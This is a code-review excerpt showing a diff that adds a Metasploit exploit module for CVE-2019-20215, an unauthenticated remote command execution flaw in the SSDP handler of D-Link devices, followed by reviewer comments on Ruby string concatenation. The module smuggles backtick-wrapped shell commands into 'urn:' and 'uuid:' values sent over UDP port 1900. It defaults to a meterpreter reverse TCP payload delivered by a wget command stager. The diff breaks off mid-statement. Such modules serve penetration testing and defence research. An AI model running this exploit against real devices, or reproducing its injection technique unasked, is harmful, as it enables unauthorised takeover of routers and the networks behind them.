modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb

```diff
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
+      'Description' => %q{
+        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
+      },
+      'Author'      =>
+        [
+          's1kr10s',
+          'secenv'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2019-20215'],
+          ['URL', 'https://medium.com/@s1kr10s/']
+        ],
+      'DisclosureDate' => 'Dec 24 2019',
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' =>
+        {
+            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'wget'
+        },
+      'Targets'        =>
+        [
+          [ 'urn',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'uuid',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ]
+        ],
+      'CmdStagerFlavor' => %w{ echo printf wget },
+      'DefaultTarget'  => 0
+      ))
+
+  register_options(
+    [
+      Opt::RHOST(),
+      Opt::RPORT(1900)
+    ])
+  end
+
+  def exploit
+    execute_cmdstager(linemax: 1500)
+  end
+
+  def execute_command(cmd, opts)
+    if target.name =~ /urn/
+      print_status("Target Payload URN")
+      val = "urn:device:1;`#{cmd}`"
+    elsif target.name =~ /uuid/
+      print_status("Target Payload UUID")
+      val = "uuid:`#{cmd}`"
+    end
+
+    connect_udp
+    header =
```

Comment:
Usually in Ruby we try to concatenate strings using the `<<` operator. This has performance benefits that, at the scale of the Metasploit Framework are important.

That would make this:
```ruby
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250:1900\r\n"
# etc.
```

Reply:
Both this comment and the approach in the module are wrong for string literals. [Here is our style guide on the subject](https://github.com/rubocop-hq/ruby-style-guide#long-strings).

Reply:
Dont know if this is still true in modern Ruby, but at least back in the day, `+=` copied the original value and added the new value before assigning back to the variable, resulting in added memory/GC pressure, while `<<` expanded the current string length by the number of bytes in the added value and wrote it in there directly (this being a good example of why there's a GIL). For small strings like this, it comes down to more of a syntax and consistency issue, but if you were doing this with giant buffers of metasm or JS or something like that, it made a noticeable difference.

Reply:
Yep, the `+` copies are quite bad. The hidden cost of using `<<` for concatenation of literals is that you still have all the extra string objects being created and then abandoned to the garbage collector.